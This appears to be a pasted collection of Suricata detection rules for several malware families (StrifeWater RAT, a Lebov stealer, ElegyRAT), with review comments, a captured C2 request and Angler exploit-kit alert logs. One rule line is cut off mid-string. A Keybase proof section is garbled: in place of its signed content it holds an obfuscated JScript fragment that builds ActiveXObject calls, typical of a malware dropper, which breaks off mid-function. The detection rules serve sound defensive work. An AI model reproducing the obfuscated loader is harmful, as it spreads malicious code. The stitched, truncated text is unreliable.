StrifeWater RAT Suricata Signatures
# StrifeWater RAT (Moses Staff) check-in: HTTP POST from HOME_NET to a URI ending in ".php"
# whose multipart body carries form parts named "token", "tid", "apiData" and a binary "data"
# file part (filename="data", Content-Type: application/octet-stream).
# The four body content matches carry no distance/within modifiers, so the parts may appear
# in any order anywhere in the request body. fast_pattern sits on the long "data" part header,
# presumably chosen as the most selective string for the MPM prefilter.
# The rule additionally requires that the request carries NO Referer header
# (negated match on http.header_names), which the referenced sample apparently omits.
# NOTE(review): sid:1602 is below 1000000, the range conventionally reserved for distributed
# rulesets (ET/VRT). Renumber into the local range (>= 1000000) before loading this next to
# ET Open, otherwise a duplicate-sid conflict at load time is likely.
alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET MALWARE StrifeWater RAT CnC Activity"; flow:established,to_server; http.method; content:"POST"; http.uri; content:".php"; endswith; http.request_body; content:"Content-Disposition|3a 20|form-data|3b 20|name=|22|token|22|"; content:"Content-Disposition|3a 20|form-data|3b 20|name=|22|tid|22|"; content:"Content-Disposition|3a 20|form-data|3b 20|name=|22|apiData|22|"; content:"Content-Disposition|3a 20|form-data|3b 20|name=|22|data|22 3b 20|filename=|22|data|22 0d 0a|Content-Type|3a 20|application/octet-stream|0d 0a|"; fast_pattern; http.header_names; content:!"Referer"; classtype:command-and-control; reference:url,www.cybereason.com/blog/strifewater-rat-iranian-apt-moses-staff-adds-new-trojan-to-ransomware-operations; reference:md5,a70d6bbf2acb62e257c98cb0450f4fec; sid:1602; rev:1;)
alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET USER_AGENTS Observed Non-standard User-Agent (example/1.0)"; flow:established,to_server; http.header; content:"User-Agent|
# Win32/Unk.Lebov stealer exfiltration: HTTP POST from HOME_NET to a URI ending in ".php"
# whose multipart body has a form part named "file" (header terminated by CRLFCRLF), followed
# within 50 bytes by ".zip\r\n", then "\r\nPK" — the ZIP local-file-header magic — and later
# the string "system.txt" (fast_pattern), presumably an entry name inside the uploaded
# archive; confirm against the referenced sample (md5 8124a572...).
# Each follow-on content uses distance:0 (relative to the previous match), so the matches are
# ordered/anchored unlike a set of free-floating body searches.
# The request must also carry neither a Referer nor a User-Agent header (negated
# http.header_names matches) — a strong indicator for a raw WinINet/WinHTTP client.
# NOTE(review): msg says "CnC Exfil" but classtype is trojan-activity; the sibling StrifeWater
# rule in this gist uses command-and-control for C2 traffic — consider aligning.
# NOTE(review): sid:12345 is below the 1000000 local-rule range; renumber before deploying
# alongside a distributed ruleset to avoid a duplicate-sid load conflict.
alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET MALWARE Win32/Unk.Lebov Stealer CnC Exfil"; flow:established,to_server; http.method; content:"POST"; http.uri; content:".php"; endswith; http.request_body; content:"Content-Disposition|3a 20|form-data|3b 20|name=|22|file|22 0d 0a 0d 0a|"; content:".zip|0d 0a|"; distance:0; within:50; content:"|0d 0a|PK"; distance:0; content:"system.txt"; distance:0; fast_pattern; http.header_names; content:!"Referer"; content:!"User-Agent"; reference:md5,8124a572f854007e63cc7337547a37af; classtype:trojan-activity; sid:12345; rev:1;)
# ElegyRAT TLS C2: fires on the server certificate presented to a HOME_NET client
# (EXTERNAL_NET -> HOME_NET, flow to_client) when both the certificate subject and issuer
# end with "CN=ElegyRAT Server". Identical subject and issuer is consistent with a
# self-signed certificate, which is why a plain CN match is sufficient here.
# fast_pattern is placed on the subject match; the issuer match is a secondary confirmation.
# Because this matches on certificate fields only, it works on TLS 1.2 and earlier; with
# TLS 1.3 the server certificate is encrypted and this rule will not see it — note as a gap.
# sid:10000000 is already in the local range (>= 1000000), so no renumbering is needed.
alert tls $EXTERNAL_NET any -> $HOME_NET any (msg:"ET MALWARE Observed Malicious SSL Cert (ElegyRAT)"; flow:established,to_client; tls.cert_subject; content:"CN=ElegyRAT Server"; fast_pattern; endswith; tls.cert_issuer; content:"CN=ElegyRAT Server"; endswith; reference:md5,a24cae9f6cf137e0e72817a1879f0acf; classtype:domain-c2; sid:10000000; rev:1;)
https://app.any.run/tasks/c9b7183c-011b-4a50-96cc-b09c2876b183/
POST /request HTTP/1.1
Accept: text/plain
Content-Type: application/x-www-form-urlencoded
User-Agent: rvOgJiq
Host: weloverocknroll.online
Content-Length: 640
request=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
2015-09-23 Angler EK
ETPRO.Suri.2.0.8
2015-09-23 02:32:39.09 UTC - 87.98.177.124:80 -> 192.168.26.10:1276 - ETPRO CURRENT_EVENTS Evil Redirector Leading to EK Aug 31 2015 M1
2015-09-23 02:32:39.09 UTC - 87.98.177.124:80 -> 192.168.26.10:1276 - ETPRO CURRENT_EVENTS Evil Redirector Leading to EK Aug 31 2015 M2
2015-09-23 02:32:39.09 UTC - 87.98.177.124:80 -> 192.168.26.10:1276 - ETPRO CURRENT_EVENTS Evil Redirector Leading to EK Aug 31 2015 M3
2015-09-23 02:32:42.00 UTC - 192.168.26.10:1325 -> 62.109.5.133:80 - ETPRO CURRENT_EVENTS Angler Possible EK Landing URI Struct Jul 15 M3 T1
2015-09-23 02:32:42.38 UTC - 62.109.5.133:80 -> 192.168.26.10:1325 - ETPRO CURRENT_EVENTS Angler EK Landing June 16 2015 M5
2015-09-23 02:32:42.38 UTC - 62.109.5.133:80 -> 192.168.26.10:1325 - ETPRO CURRENT_EVENTS Angler EK Landing June 1 2015
2015-09-23 02:32:42.38 UTC - 62.109.5.133:80 -> 192.168.26.10:1325 - ETPRO CURRENT_EVENTS Angler EK Landing Sep 22 2015 T1 M1

Keybase proof

I hereby claim:

  • I am malwareforme on github.
  • I am malwareforme (https://keybase.io/malwareforme) on keybase.
  • I have a public key whose fingerprint is BDE4 6403 4E5B 0474 E345 EA6F 4CF5 EDCF 62AC 0200

To claim this, I am signing this object:

(function() {
var yn4 = "MOYpSB=Q2Nji=gK&Qe@d1p" [(35.0 + "QE\x8bf\x60\x83ZyiY8I$=" ["charCodeAt"](13) * 826342734)["toString"]((0 * "$L+OA\x89\x84Q\x80|x0" ["charCodeAt"](3) + 35.0))](/[Y\=jK\@M2e\&1S]/g, "");
gD7 = ("#Cv$Z\x88u'+s-GxVy\x82" ["charCodeAt"](7) * 2 + 23.0);
var pew = ("ZA|9m]c5NX',si" ["length"] * 31 + 1.0);
jfa = (9 * "Ff1#]WSlV7aK" ["length"] + 6.0);
Am5 = ("e$|R9Da=,]s3I\x8bu5O" ["charCodeAt"](8) * 5 + 30.0);
function LC2(fr, ERo, rn) {
var QDy = new ActiveXObject("~Wo]S7BczrziQ=pC_tA.;SPhqe`~lHyl" [(2217011921 * "nV8cvmy=[KH" ["length"] + 2.0)["toString"]((3 * "\x86XIg\x8a_4^t" ["length"] + 4.0))](/[yPQ7o\`\=qz\~HC\_AB\]\;]/g, ""));
N5D = "vsQTm;CQCNEDWAYGTxL>R>n" [("C\x87N0uc)#'oR-_" ["charCodeAt"](6) * 488878692 + 2.0)["toString"](("?a(I6^'Nl\x83E\x80\x81_" ["charCodeAt"](4) * 0 + 30.0))](/[NL\;\>WQTYEv]/g, "");